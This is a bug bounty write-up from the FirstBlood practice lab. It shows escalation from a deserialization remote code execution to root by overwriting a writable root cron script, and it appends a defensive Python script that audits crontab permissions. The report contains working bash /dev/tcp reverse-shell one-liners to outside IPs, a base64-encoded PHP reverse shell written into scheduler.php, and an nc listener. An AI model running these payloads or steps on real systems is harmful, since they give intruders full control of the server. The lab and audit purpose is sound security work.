FirstBlood-#692 — Becoming a root on the server
This issue was discovered on FirstBlood v2.0.0 (issues patched)
On 2021-10-27, panya reported:
As I reported in https://www.bugbountyhunter.com/hackevents/report?id=475 the site contains an insecure deserialization vulnerability which leads to RCE.
After I exploited it and popped a reverse shell with this payload:
/bin/bash -c 'bash -i >& /dev/tcp/126.96.36.199/1234 0>&1'
I noticed that the current user is
After navigating through the file system and reading files, I found the file scheduler.php with this comment:
/* Tell Raymond on the server team to turn off the crontab until we need it -Patrice */
I checked cron jobs and found this one (in the
* * * * * root cd /app/firstblood && php scheduler.php >> /dev/null 2>&1
The scheduler.php file is executed via php by the root user every minute.
The fb-exec user can write to this file.
So to become the root of this server, we can write another reverse shell payload to this file:
echo PD9waHAgc3lzdGVtKCIvYmluL2Jhc2ggLWMgJ2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTU3LjIzMC4xMjUuMTkyLzEyMzQgMD4mMSciKTsgPz4= | base64 -d > scheduler.php
PD9waHAgc3lzdGVtKCIvYmluL2Jhc2ggLWMgJ2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTU3LjIzMC4xMjUuMTkyLzEyMzQgMD4mMSciKTsgPz4= is our base64-encoded PHP reverse shell code:
<?php system("/bin/bash -c 'bash -i >& /dev/tcp/188.8.131.52/1234 0>&1'"); ?>
And after running nc -nvlp 1234 on my server (184.108.40.206) and waiting a bit, I got the root shell:
id
uid=0(root) gid=0(root) groups=0(root)
FirstBlood ID: 35
Vulnerability Type: RCE
A cron job executes the file /app/firstblood/scheduler.php every minute as the root user. This file is writable by the FirstBlood PHP pool user (fb-exec), so any code-execution bug in the application running as that user (such as the [checkproof bug]) can be combined with it to obtain root privileges.
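The root cause summarised above is a configuration defect: a root cron job whose target file a lower-privileged account can modify. The following audit script is an added example, not part of the report or of FirstBlood; it parses /etc/crontab-style entries, follows a leading `cd DIR &&` so relative script names resolve, and flags every root job whose program or script file is missing, not root-owned, group- or world-writable, or sits in a directory a non-root user could replace it from. The sample crontab and the fake filesystem root it is checked against are constructed for the demo; the `root=` parameter lets the same check run over a mounted disk image.

```python
import os
import re
import shlex
import stat
import tempfile

# Constructed sample in /etc/crontab format (five time fields, user, command).
# The first job mirrors the entry quoted in the report above.
SAMPLE_CRONTAB = """\
# m h dom mon dow user  command
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
* * * * * root cd /app/firstblood && php scheduler.php >> /dev/null 2>&1
0 3 * * * root /usr/bin/updatedb
"""

TIME_FIELDS = 5
SCRIPT_EXT = (".php", ".sh", ".py", ".pl", ".rb")
SEPARATORS = re.compile(r"\s*(?:&&|\|\||;|\|)\s*")   # command separators
REDIRECTS = re.compile(r"\s*\d*[<>]+&?\s*\S*")         # e.g. ">> /dev/null 2>&1"


def parse_system_crontab(text):
    """Return (user, command) pairs from /etc/crontab-style text.
    Comments, blank lines and VAR=value lines are skipped; @reboot-style
    shortcuts are not handled by this simplified parser."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        parts = line.split(None, TIME_FIELDS + 1)
        if len(parts) == TIME_FIELDS + 2:
            entries.append((parts[TIME_FIELDS], parts[TIME_FIELDS + 1]))
    return entries


def script_paths_from_command(command, cwd="/"):
    """Absolute paths of the programs and script files a cron command runs.
    A leading `cd DIR &&` is followed so relative names (scheduler.php above)
    resolve; bare interpreter names such as `php` come from PATH and are skipped."""
    paths = []
    for segment in SEPARATORS.split(REDIRECTS.sub("", command)):
        try:
            tokens = shlex.split(segment)
        except ValueError:
            continue
        if not tokens:
            continue
        if tokens[0] == "cd":
            if len(tokens) > 1:
                cwd = os.path.normpath(os.path.join(cwd, tokens[1]))
            continue
        candidates = [tokens[0]] + [t for t in tokens[1:] if t.endswith(SCRIPT_EXT)]
        for c in candidates:
            if "/" in c or c.endswith(SCRIPT_EXT):
                paths.append(os.path.normpath(os.path.join(cwd, c)))
    return paths


def non_root_write_access(path, root="/"):
    """Reasons a non-root account could change the file at `path`, looked up
    under `root` so a mounted image is audited the same way as a live host."""
    real = os.path.join(root, path.lstrip("/"))
    try:
        st = os.lstat(real)
    except FileNotFoundError:
        return ["missing: whoever can create it controls the job"]
    reasons = []
    if st.st_uid != 0:
        reasons.append(f"owned by uid {st.st_uid}, not root")
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        reasons.append(f"group-writable (gid {st.st_gid})")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    # A writable parent directory without the sticky bit allows the file to be replaced.
    pst = os.lstat(os.path.dirname(real))
    if pst.st_uid != 0 or (pst.st_mode & stat.S_IWOTH and not pst.st_mode & stat.S_ISVTX):
        reasons.append("parent directory lets a non-root user replace the file")
    return reasons


def audit_crontab(text, root="/"):
    """Findings for jobs that run as root from a file a non-root user can change."""
    findings = []
    for user, command in parse_system_crontab(text):
        if user != "root":
            continue
        for path in script_paths_from_command(command):
            reasons = non_root_write_access(path, root)
            if reasons:
                findings.append({"command": command, "path": path, "reasons": reasons})
    return findings


def demo():
    """Build a throwaway fake root holding a world-writable scheduler.php
    (constructed, mirroring the weak permission in the report) and audit it."""
    root = tempfile.mkdtemp()
    app = os.path.join(root, "app", "firstblood")
    os.makedirs(app)
    script = os.path.join(app, "scheduler.php")
    with open(script, "w") as fh:
        fh.write("<?php /* placeholder job body */ ?>\n")
    os.chmod(script, 0o666)
    return audit_crontab(SAMPLE_CRONTAB, root=root)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['path']}: {', '.join(f['reasons'])}  <- {f['command']}")
```

Run it against a live host with `audit_crontab(open("/etc/crontab").read())` and repeat for the files under /etc/cron.d; the fix for a hit like the one above is to make the job's file root-owned and mode 0644 (or 0755 for executables), or to move it out of the web application's writable tree entirely, as the comment in scheduler.php already hinted.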